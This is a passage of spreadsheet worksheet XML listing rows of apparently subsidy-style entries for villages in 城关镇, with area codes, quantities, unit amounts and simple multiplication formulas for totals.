      <c r="H219" s="17"/>
      <c r="I219" s="17"/>
      <c r="J219" s="17"/>
      <c r="K219" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="220" customHeight="1" spans="1:11">
      <c r="A220" s="16" t="s">
        <v>771</v>
      </c>
      <c r="B220" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C220" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D220" s="17" t="s">
        <v>772</v>
      </c>
      <c r="E220" s="17" t="s">
        <v>773</v>
      </c>
      <c r="F220" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G220" s="17">
        <v>1</v>
      </c>
      <c r="H220" s="18">
        <v>365</v>
      </c>
      <c r="I220" s="17">
        <f>H220*G220</f>
        <v>365</v>
      </c>
      <c r="J220" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K220" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="221" customHeight="1" spans="1:11">
      <c r="A221" s="16" t="s">
        <v>774</v>
      </c>
      <c r="B221" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C221" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D221" s="17" t="s">
        <v>775</v>
      </c>
      <c r="E221" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F221" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G221" s="17">
        <v>2</v>
      </c>
      <c r="H221" s="18">
        <v>325</v>
      </c>
      <c r="I221" s="17">
        <f>H221*G221</f>
        <v>650</v>
      </c>
      <c r="J221" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K221" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="222" customHeight="1" spans="1:11">
      <c r="A222" s="16" t="s">
        <v>776</v>
      </c>
      <c r="B222" s="17" t="str">
        <f>B221</f>
        <v>城关镇</v>
      </c>
      <c r="C222" s="17" t="str">
        <f>C221</f>
        <v>中华村</v>
      </c>
      <c r="D222" s="16" t="s">
        <v>777</v>
      </c>
      <c r="E222" s="16" t="s">
        <v>303</v>
      </c>
      <c r="F222" s="17" t="str">
        <f>F221</f>
        <v>4113210108</v>
      </c>
      <c r="G222" s="17"/>
      <c r="H222" s="17"/>
      <c r="I222" s="17"/>
      <c r="J222" s="17"/>
      <c r="K222" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="223" customHeight="1" spans="1:11">
      <c r="A223" s="16" t="s">
        <v>778</v>
      </c>
      <c r="B223" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C223" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D223" s="17" t="s">
        <v>779</v>
      </c>
      <c r="E223" s="17" t="s">
        <v>780</v>
      </c>
      <c r="F223" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G223" s="17">
        <v>2</v>
      </c>
      <c r="H223" s="18">
        <v>325</v>
      </c>
      <c r="I223" s="17">
        <f>H223*G223</f>
        <v>650</v>
      </c>
      <c r="J223" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K223" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="224" customHeight="1" spans="1:11">
      <c r="A224" s="16" t="s">
        <v>781</v>
      </c>
      <c r="B224" s="17" t="str">
        <f>B223</f>
        <v>城关镇</v>
      </c>
      <c r="C224" s="17" t="str">
        <f>C223</f>
        <v>东北一组</v>
      </c>
      <c r="D224" s="16" t="s">
        <v>782</v>
      </c>
      <c r="E224" s="16" t="s">
        <v>346</v>
      </c>
      <c r="F224" s="17" t="str">
        <f>F223</f>
        <v>4113210103</v>
      </c>
      <c r="G224" s="17"/>
      <c r="H224" s="17"/>
      <c r="I224" s="17"/>
      <c r="J224" s="17"/>
      <c r="K224" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="225" customHeight="1" spans="1:11">
      <c r="A225" s="16" t="s">
        <v>783</v>
      </c>
      <c r="B225" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C225" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D225" s="17" t="s">
        <v>784</v>
      </c>
      <c r="E225" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F225" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G225" s="17">
        <v>2</v>
      </c>
      <c r="H225" s="18">
        <v>325</v>
      </c>
      <c r="I225" s="17">
        <f>H225*G225</f>
        <v>650</v>
      </c>
      <c r="J225" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K225" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="226" customHeight="1" spans="1:11">
      <c r="A226" s="16" t="s">
        <v>785</v>
      </c>
      <c r="B226" s="17" t="str">
        <f>B225</f>
        <v>城关镇</v>
      </c>
      <c r="C226" s="17" t="str">
        <f>C225</f>
        <v>西北村</v>
      </c>
      <c r="D226" s="16" t="s">
        <v>786</v>
      </c>
      <c r="E226" s="16" t="s">
        <v>239</v>
      </c>
      <c r="F226" s="17" t="str">
        <f>F225</f>
        <v>4113210106</v>
      </c>
      <c r="G226" s="17"/>
      <c r="H226" s="17"/>
      <c r="I226" s="17"/>
      <c r="J226" s="17"/>
      <c r="K226" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="227" customHeight="1" spans="1:11">
      <c r="A227" s="16" t="s">
        <v>787</v>
      </c>
      <c r="B227" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C227" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D227" s="17" t="s">
        <v>788</v>
      </c>
      <c r="E227" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F227" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G227" s="17">
        <v>2</v>
      </c>
      <c r="H227" s="18">
        <v>325</v>
      </c>
      <c r="I227" s="17">
        <f>H227*G227</f>
        <v>650</v>
      </c>
      <c r="J227" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K227" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="228" customHeight="1" spans="1:11">
      <c r="A228" s="16" t="s">
        <v>789</v>
      </c>
      <c r="B228" s="17" t="str">
        <f>B227</f>
        <v>城关镇</v>
      </c>
      <c r="C228" s="17" t="str">
        <f>C227</f>
        <v>中华村</v>
      </c>
      <c r="D228" s="16" t="s">
        <v>790</v>
      </c>
      <c r="E228" s="16" t="s">
        <v>791</v>
      </c>
      <c r="F228" s="17" t="str">
        <f>F227</f>
        <v>4113210108</v>
      </c>
      <c r="G228" s="17"/>
      <c r="H228" s="17"/>
      <c r="I228" s="17"/>
      <c r="J228" s="17"/>
      <c r="K228" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="229" customHeight="1" spans="1:11">
      <c r="A229" s="16" t="s">
        <v>792</v>
      </c>
      <c r="B229" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C229" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D229" s="17" t="s">
        <v>793</v>
      </c>
      <c r="E229" s="17" t="s">
        <v>435</v>
      </c>
      <c r="F229" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G229" s="17">
        <v>1</v>
      </c>
      <c r="H229" s="18">
        <v>365</v>
      </c>
      <c r="I229" s="17">
        <f>H229*G229</f>
        <v>365</v>
      </c>
      <c r="J229" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K229" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="230" customHeight="1" spans="1:11">
      <c r="A230" s="16" t="s">
        <v>794</v>
      </c>
      <c r="B230" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C230" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D230" s="17" t="s">
        <v>795</v>
      </c>
      <c r="E230" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F230" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G230" s="17">
        <v>1</v>
      </c>
      <c r="H230" s="18">
        <v>365</v>
      </c>
      <c r="I230" s="17">
        <f>H230*G230</f>
        <v>365</v>
      </c>
      <c r="J230" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K230" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="231" customHeight="1" spans="1:11">
      <c r="A231" s="16" t="s">
        <v>796</v>
      </c>
      <c r="B231" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C231" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D231" s="17" t="s">
        <v>797</v>
      </c>
      <c r="E231" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F231" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G231" s="17">
        <v>1</v>
      </c>
      <c r="H231" s="18">
        <v>365</v>
      </c>
      <c r="I231" s="17">
        <f>H231*G231</f>
        <v>365</v>
      </c>
      <c r="J231" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K231" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="232" customHeight="1" spans="1:11">
      <c r="A232" s="16" t="s">
        <v>798</v>
      </c>
      <c r="B232" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C232" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D232" s="17" t="s">
        <v>799</v>
      </c>
      <c r="E232" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F232" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G232" s="17">
        <v>2</v>
      </c>
      <c r="H232" s="18">
        <v>325</v>
      </c>
      <c r="I232" s="17">
        <f>H232*G232</f>
        <v>650</v>
      </c>
      <c r="J232" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K232" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="233" customHeight="1" spans="1:11">
      <c r="A233" s="16" t="s">
        <v>800</v>
      </c>
      <c r="B233" s="17" t="str">
        <f>B232</f>
        <v>城关镇</v>
      </c>
      <c r="C233" s="17" t="str">
        <f>C232</f>
        <v>北外村</v>
      </c>
      <c r="D233" s="26" t="s">
        <v>801</v>
      </c>
      <c r="E233" s="26" t="s">
        <v>239</v>
      </c>
      <c r="F233" s="17" t="str">
        <f>F232</f>
        <v>4113210102</v>
      </c>
      <c r="G233" s="17"/>
      <c r="H233" s="17"/>
      <c r="I233" s="17"/>
      <c r="J233" s="17"/>
      <c r="K233" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="234" customHeight="1" spans="1:11">
      <c r="A234" s="16" t="s">
        <v>802</v>
      </c>
      <c r="B234" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C234" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D234" s="17" t="s">
        <v>803</v>
      </c>
      <c r="E234" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F234" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G234" s="17">
        <v>2</v>
      </c>
      <c r="H234" s="18">
        <v>325</v>
      </c>
      <c r="I234" s="17">
        <f>H234*G234</f>
        <v>650</v>
      </c>
      <c r="J234" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K234" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="235" customHeight="1" spans="1:11">
      <c r="A235" s="16" t="s">
        <v>804</v>
      </c>
      <c r="B235" s="17" t="str">
        <f>B234</f>
        <v>城关镇</v>
      </c>
      <c r="C235" s="17" t="str">
        <f>C234</f>
        <v>北外村</v>
      </c>
      <c r="D235" s="16" t="s">
        <v>805</v>
      </c>
      <c r="E235" s="16" t="s">
        <v>806</v>
      </c>
      <c r="F235" s="17" t="str">
        <f>F234</f>
        <v>4113210102</v>
      </c>
      <c r="G235" s="17"/>
      <c r="H235" s="17"/>
      <c r="I235" s="17"/>
      <c r="J235" s="17"/>
      <c r="K235" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="236" customHeight="1" spans="1:11">
      <c r="A236" s="16" t="s">
        <v>807</v>
      </c>
      <c r="B236" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C236" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D236" s="17" t="s">
        <v>808</v>
      </c>
      <c r="E236" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F236" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G236" s="17">
        <v>1</v>
      </c>
      <c r="H236" s="18">
        <v>365</v>
      </c>
      <c r="I236" s="17">
        <f>H236*G236</f>
        <v>365</v>
      </c>
      <c r="J236" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K236" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="237" customHeight="1" spans="1:11">
      <c r="A237" s="16" t="s">
        <v>809</v>
      </c>
      <c r="B237" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C237" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D237" s="17" t="s">
        <v>810</v>
      </c>
      <c r="E237" s="17" t="s">
        <v>811</v>
      </c>
      <c r="F237" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G237" s="17">
        <v>2</v>
      </c>
      <c r="H237" s="18">
        <v>325</v>
      </c>
      <c r="I237" s="17">
        <f>H237*G237</f>
        <v>650</v>
      </c>
      <c r="J237" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K237" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="238" customHeight="1" spans="1:11">
      <c r="A238" s="16" t="s">
        <v>812</v>
      </c>
      <c r="B238" s="17" t="str">
        <f>B237</f>
        <v>城关镇</v>
      </c>
      <c r="C238" s="17" t="str">
        <f>C237</f>
        <v>中华村</v>
      </c>
      <c r="D238" s="16" t="s">
        <v>813</v>
      </c>
      <c r="E238" s="16" t="s">
        <v>814</v>
      </c>
      <c r="F238" s="17" t="str">
        <f>F237</f>
        <v>4113210108</v>
      </c>
      <c r="G238" s="17"/>
      <c r="H238" s="17"/>
      <c r="I238" s="17"/>
      <c r="J238" s="17"/>
      <c r="K238" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="239" customHeight="1" spans="1:11">
      <c r="A239" s="16" t="s">
        <v>815</v>
      </c>
      <c r="B239" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C239" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D239" s="17" t="s">
        <v>816</v>
      </c>
      <c r="E239" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F239" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G239" s="17">
        <v>1</v>
      </c>
      <c r="H239" s="18">
        <v>365</v>
      </c>
      <c r="I239" s="17">
        <f>H239*G239</f>
        <v>365</v>
      </c>
      <c r="J239" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K239" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="240" customHeight="1" spans="1:11">
      <c r="A240" s="16" t="s">
        <v>817</v>
      </c>
      <c r="B240" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C240" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D240" s="17" t="s">
        <v>818</v>
      </c>
      <c r="E240" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F240" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G240" s="17">
        <v>3</v>
      </c>
      <c r="H240" s="18">
        <v>320</v>
      </c>
      <c r="I240" s="17">
        <f>H240*G240</f>
        <v>960</v>
      </c>
      <c r="J240" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K240" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="241" customHeight="1" spans="1:11">
      <c r="A241" s="16" t="s">
        <v>819</v>
      </c>
      <c r="B241" s="17" t="str">
        <f>B240</f>
        <v>城关镇</v>
      </c>
      <c r="C241" s="17" t="str">
        <f>C240</f>
        <v>中华村</v>
      </c>
      <c r="D241" s="16" t="s">
        <v>820</v>
      </c>
      <c r="E241" s="16" t="s">
        <v>821</v>
      </c>
      <c r="F241" s="17" t="str">
        <f>F240</f>
        <v>4113210108</v>
      </c>
      <c r="G241" s="17"/>
      <c r="H241" s="17"/>
      <c r="I241" s="17"/>
      <c r="J241" s="17"/>
      <c r="K241" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="242" customHeight="1" spans="1:11">
      <c r="A242" s="16" t="s">
        <v>822</v>
      </c>
      <c r="B242" s="17" t="str">
        <f>B241</f>
        <v>城关镇</v>
      </c>
      <c r="C242" s="17" t="str">
        <f>C241</f>
        <v>中华村</v>
      </c>
      <c r="D242" s="19" t="s">
        <v>823</v>
      </c>
      <c r="E242" s="19" t="s">
        <v>603</v>
      </c>
      <c r="F242" s="17" t="str">
        <f>F241</f>
        <v>4113210108</v>
      </c>
      <c r="G242" s="17"/>
      <c r="H242" s="17"/>
      <c r="I242" s="17"/>
      <c r="J242" s="17"/>
      <c r="K242" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="243" customHeight="1" spans="1:11">
      <c r="A243" s="16" t="s">
        <v>824</v>
      </c>
      <c r="B243" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C243" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D243" s="17" t="s">
        <v>825</v>
      </c>
      <c r="E243" s="17" t="s">
        <v>612</v>
      </c>
      <c r="F243" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G243" s="17">
        <v>1</v>
      </c>
      <c r="H243" s="18">
        <v>375</v>
      </c>
      <c r="I243" s="17">
        <f>H243*G243</f>
        <v>375</v>
      </c>
      <c r="J243" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K243" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="244" customHeight="1" spans="1:11">
      <c r="A244" s="16" t="s">
        <v>826</v>
      </c>
      <c r="B244" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C244" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D244" s="17" t="s">
        <v>827</v>
      </c>
      <c r="E244" s="17" t="s">
        <v>828</v>
      </c>
      <c r="F244" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G244" s="17">
        <v>1</v>
      </c>
      <c r="H244" s="18">
        <v>365</v>
      </c>
      <c r="I244" s="17">
        <f>H244*G244</f>
        <v>365</v>
      </c>
      <c r="J244" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K244" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="245" customHeight="1" spans="1:11">
      <c r="A245" s="16" t="s">
        <v>829</v>
      </c>
      <c r="B245" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C245" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D245" s="17" t="s">
        <v>830</v>
      </c>
      <c r="E245" s="17" t="s">
        <v>542</v>
      </c>
      <c r="F245" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G245" s="17">
        <v>1</v>
      </c>
      <c r="H245" s="18">
        <v>365</v>
      </c>
      <c r="I245" s="17">
        <f>H245*G245</f>
        <v>365</v>
      </c>
      <c r="J245" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K245" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="246" customHeight="1" spans="1:11">
      <c r="A246" s="16" t="s">
        <v>831</v>
      </c>
      <c r="B246" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C246" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D246" s="17" t="s">
        <v>832</v>
      </c>
      <c r="E246" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F246" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G246" s="17">
        <v>3</v>
      </c>
      <c r="H246" s="18">
        <v>290</v>
      </c>
      <c r="I246" s="17">
        <f>H246*G246</f>
        <v>870</v>
      </c>
      <c r="J246" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K246" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="247" customHeight="1" spans="1:11">
      <c r="A247" s="16" t="s">
        <v>833</v>
      </c>
      <c r="B247" s="17" t="str">
        <f>B246</f>
        <v>城关镇</v>
      </c>
      <c r="C247" s="17" t="str">
        <f>C246</f>
        <v>北外村</v>
      </c>
      <c r="D247" s="16" t="s">
        <v>834</v>
      </c>
      <c r="E247" s="16" t="s">
        <v>835</v>
      </c>
      <c r="F247" s="17" t="str">
        <f>F246</f>
        <v>4113210102</v>
      </c>
      <c r="G247" s="17"/>
      <c r="H247" s="17"/>
      <c r="I247" s="17"/>
      <c r="J247" s="17"/>
      <c r="K247" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="248" customHeight="1" spans="1:11">
      <c r="A248" s="16" t="s">
        <v>836</v>
      </c>
      <c r="B248" s="17" t="str">
        <f>B247</f>
        <v>城关镇</v>
      </c>
      <c r="C248" s="17" t="str">
        <f>C247</f>
        <v>北外村</v>
      </c>
      <c r="D248" s="16" t="s">
        <v>837</v>
      </c>
      <c r="E248" s="16" t="s">
        <v>838</v>
      </c>
      <c r="F248" s="17" t="str">
        <f>F247</f>
        <v>4113210102</v>
      </c>
      <c r="G248" s="17"/>
      <c r="H248" s="17"/>
      <c r="I248" s="17"/>
      <c r="J248" s="17"/>
      <c r="K248" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="249" customHeight="1" spans="1:11">
      <c r="A249" s="16" t="s">
        <v>839</v>
      </c>
      <c r="B249" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C249" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D249" s="17" t="s">
        <v>840</v>
      </c>
      <c r="E249" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F249" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G249" s="17">
        <v>2</v>
      </c>
      <c r="H249" s="18">
        <v>325</v>
      </c>
      <c r="I249" s="17">
        <f>H249*G249</f>
        <v>650</v>
      </c>
      <c r="J249" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K249" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="250" customHeight="1" spans="1:11">
      <c r="A250" s="16" t="s">
        <v>841</v>
      </c>
      <c r="B250" s="17" t="str">
        <f>B249</f>
        <v>城关镇</v>
      </c>
      <c r="C250" s="17" t="str">
        <f>C249</f>
        <v>中华村</v>
      </c>
      <c r="D250" s="16" t="s">
        <v>842</v>
      </c>
      <c r="E250" s="16" t="s">
        <v>499</v>
      </c>
      <c r="F250" s="17" t="str">
        <f>F249</f>
        <v>4113210108</v>
      </c>
      <c r="G250" s="17"/>
      <c r="H250" s="17"/>
      <c r="I250" s="17"/>
      <c r="J250" s="17"/>
      <c r="K250" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="251" customHeight="1" spans="1:11">
      <c r="A251" s="16" t="s">
        <v>843</v>
      </c>
      <c r="B251" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C251" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D251" s="17" t="s">
        <v>844</v>
      </c>
      <c r="E251" s="17" t="s">
        <v>496</v>
      </c>
      <c r="F251" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G251" s="17">
        <v>1</v>
      </c>
      <c r="H251" s="18">
        <v>365</v>
      </c>
      <c r="I251" s="17">
        <f>H251*G251</f>
        <v>365</v>
      </c>
      <c r="J251" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K251" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="252" customHeight="1" spans="1:11">
      <c r="A252" s="16" t="s">
        <v>845</v>
      </c>
      <c r="B252" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C252" s="17" t="s">
        <v>643</v>
      </c>
      <c r="D252" s="17" t="s">
        <v>846</v>
      </c>
      <c r="E252" s="17" t="s">
        <v>847</v>
      </c>
      <c r="F252" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G252" s="17">
        <v>2</v>
      </c>
      <c r="H252" s="18">
        <v>325</v>
      </c>
      <c r="I252" s="17">
        <f>H252*G252</f>
        <v>650</v>
      </c>
      <c r="J252" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K252" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="253" customHeight="1" spans="1:11">
      <c r="A253" s="16" t="s">
        <v>848</v>
      </c>
      <c r="B253" s="17" t="str">
        <f>B252</f>
        <v>城关镇</v>
      </c>
      <c r="C253" s="17" t="str">
        <f>C252</f>
        <v>东北二组</v>
      </c>
      <c r="D253" s="16" t="s">
        <v>849</v>
      </c>
      <c r="E253" s="16" t="s">
        <v>850</v>
      </c>
      <c r="F253" s="17" t="str">
        <f>F252</f>
        <v>4113210103</v>
      </c>
      <c r="G253" s="17"/>
      <c r="H253" s="17"/>
      <c r="I253" s="17"/>
      <c r="J253" s="17"/>
      <c r="K253" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="254" customHeight="1" spans="1:11">
      <c r="A254" s="16" t="s">
        <v>851</v>
      </c>
      <c r="B254" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C254" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D254" s="17" t="s">
        <v>852</v>
      </c>
      <c r="E254" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F254" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G254" s="17">
        <v>2</v>
      </c>
      <c r="H254" s="18">
        <v>325</v>
      </c>
      <c r="I254" s="17">
        <f>H254*G254</f>
        <v>650</v>
      </c>
      <c r="J254" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K254" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="255" customHeight="1" spans="1:11">
      <c r="A255" s="16" t="s">
        <v>853</v>
      </c>
      <c r="B255" s="17" t="str">
        <f>B254</f>
        <v>城关镇</v>
      </c>
      <c r="C255" s="17" t="str">
        <f>C254</f>
        <v>东北六组</v>
      </c>
      <c r="D255" s="16" t="s">
        <v>854</v>
      </c>
      <c r="E255" s="16" t="s">
        <v>306</v>
      </c>
      <c r="F255" s="17" t="str">
        <f>F254</f>
        <v>4113210103</v>
      </c>
      <c r="G255" s="17"/>
      <c r="H255" s="17"/>
      <c r="I255" s="17"/>
      <c r="J255" s="17"/>
      <c r="K255" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="256" customHeight="1" spans="1:11">
      <c r="A256" s="16" t="s">
        <v>855</v>
      </c>
      <c r="B256" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C256" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D256" s="17" t="s">
        <v>856</v>
      </c>
      <c r="E256" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F256" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G256" s="17">
        <v>1</v>
      </c>
      <c r="H256" s="18">
        <v>365</v>
      </c>
      <c r="I256" s="17">
        <f>H256*G256</f>
        <v>365</v>
      </c>
      <c r="J256" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K256" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="257" customHeight="1" spans="1:11">
      <c r="A257" s="16" t="s">
        <v>857</v>
      </c>
      <c r="B257" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C257" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D257" s="17" t="s">
        <v>858</v>
      </c>
      <c r="E257" s="17" t="s">
        <v>453</v>
      </c>
      <c r="F257" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G257" s="17">
        <v>1</v>
      </c>
      <c r="H257" s="18">
        <v>365</v>
      </c>
      <c r="I257" s="17">
        <f>H257*G257</f>
        <v>365</v>
      </c>
      <c r="J257" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K257" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="258" customHeight="1" spans="1:11">
      <c r="A258" s="16" t="s">
        <v>859</v>
      </c>
      <c r="B258" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C258" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D258" s="17" t="s">
        <v>860</v>
      </c>
      <c r="E258" s="17" t="s">
        <v>861</v>
      </c>
      <c r="F258" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G258" s="17">
        <v>2</v>
      </c>
      <c r="H258" s="18">
        <v>325</v>
      </c>
      <c r="I258" s="17">
        <f>H258*G258</f>
        <v>650</v>
      </c>
      <c r="J258" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K258" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="259" customHeight="1" spans="1:11">
      <c r="A259" s="16" t="s">
        <v>862</v>
      </c>
      <c r="B259" s="17" t="str">
        <f>B258</f>
        <v>城关镇</v>
      </c>
      <c r="C259" s="17" t="str">
        <f>C258</f>
        <v>中华村</v>
      </c>
      <c r="D259" s="16" t="s">
        <v>863</v>
      </c>
      <c r="E259" s="16" t="s">
        <v>269</v>
      </c>
      <c r="F259" s="17" t="str">
        <f>F258</f>
        <v>4113210108</v>
      </c>
      <c r="G259" s="17"/>
      <c r="H259" s="17"/>
      <c r="I259" s="17"/>
      <c r="J259" s="17"/>
      <c r="K259" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="260" customHeight="1" spans="1:11">
      <c r="A260" s="16" t="s">
        <v>864</v>
      </c>
      <c r="B260" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C260" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D260" s="17" t="s">
        <v>865</v>
      </c>
      <c r="E260" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F260" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G260" s="17">
        <v>1</v>
      </c>
      <c r="H260" s="18">
        <v>365</v>
      </c>
      <c r="I260" s="17">
        <f t="shared" ref="I260:I266" si="8">H260*G260</f>
        <v>365</v>
      </c>
      <c r="J260" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K260" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="261" customHeight="1" spans="1:11">
      <c r="A261" s="16" t="s">
        <v>866</v>
      </c>
      <c r="B261" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C261" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D261" s="17" t="s">
        <v>867</v>
      </c>
      <c r="E261" s="17" t="s">
        <v>360</v>
